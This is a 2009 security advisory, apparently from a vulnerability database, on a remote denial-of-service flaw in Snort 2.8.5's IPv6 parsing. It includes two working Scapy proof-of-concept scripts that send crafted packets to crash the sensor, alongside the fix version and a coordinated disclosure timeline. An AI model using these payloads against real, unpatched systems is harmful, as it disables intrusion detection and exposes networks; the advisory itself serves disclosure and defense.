Snort <= 2.8.5 IPV6 Remote Denial of Service Vulnerability

2009-10-22 / 2009-10-23
Credit: Laurent Gaffi
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

============================================= - Date: October 22th, 2009 - Discovered by: Laurent Gaffi - Severity: Low ============================================= I. VULNERABILITY ------------------------- Snort <= 2.8.5 IPV6 Remote DoS II. DESCRIPTION ------------------------- A remote DoS was present in Snort 2.8.5 when parsing some specialy IPv6 crafted packet To trigger theses bugs you need to have compiled snort with the --enable-ipv6 option, and run it in verbose mode (-v) III. PROOF OF CONCEPT ------------------------- You can reproduce theses two differents bugs easily by using the Python low-level networking lib Scapy (http://www.secdev.org/projects/scapy/files/scapy-latest.zip) 1) #only works on x86 #/usr/bin/env python from scapy.all import * u = "\x92"+"\x02" * 6 send(IPv6(dst="IPv6_addr_here", nh=6)/u) #nh6 -> TCP 2) # works x86,x64 #/usr/bin/env python from scapy.all import * z = "Q" * 30 send(IPv6(dst="IPv6_ADDR_HERE",nh=1)/ICMPv6NIQueryNOOP(type=4)/z) #nh1 -> icmp (not v6) IV. SYSTEMS AFFECTED ------------------------- Theses proof of concept as been tested on snort: - 2.8.5 V. NOT AFFECTED ------------------------- Sourcefire 3D Sensor VI. SOLUTION ------------------------- A new version correcting theses issues as been released (2.8.5.1) : http://www.snort.org/downloads VII. REFERENCES ------------------------- http://www.snort.org/ http://vrt-sourcefire.blogspot.com/ VIII. REVISION HISTORY ------------------------- October 14th, 2009: First issue discovered, advisory send to snort team. October 14th, 2009: Snort security team confirm the bug. October 16th, 2009: Second issue discovered, advisory send to snort team. October 20th, 2009: Snort security team confirm the bug. October 22th, 2009: Snort team released a new version. IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffi Laurent.gaffie{remove-this}(at)gmail.com

References:

http://www.snort.org/
http://vrt-sourcefire.blogspot.com/
http://vrt-sourcefire.blogspot.com/2009/10/snort-2851-release.html
http://g-laurent.blogspot.com/2009/10/snort-285-ipv6-remote-denial-of-service.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top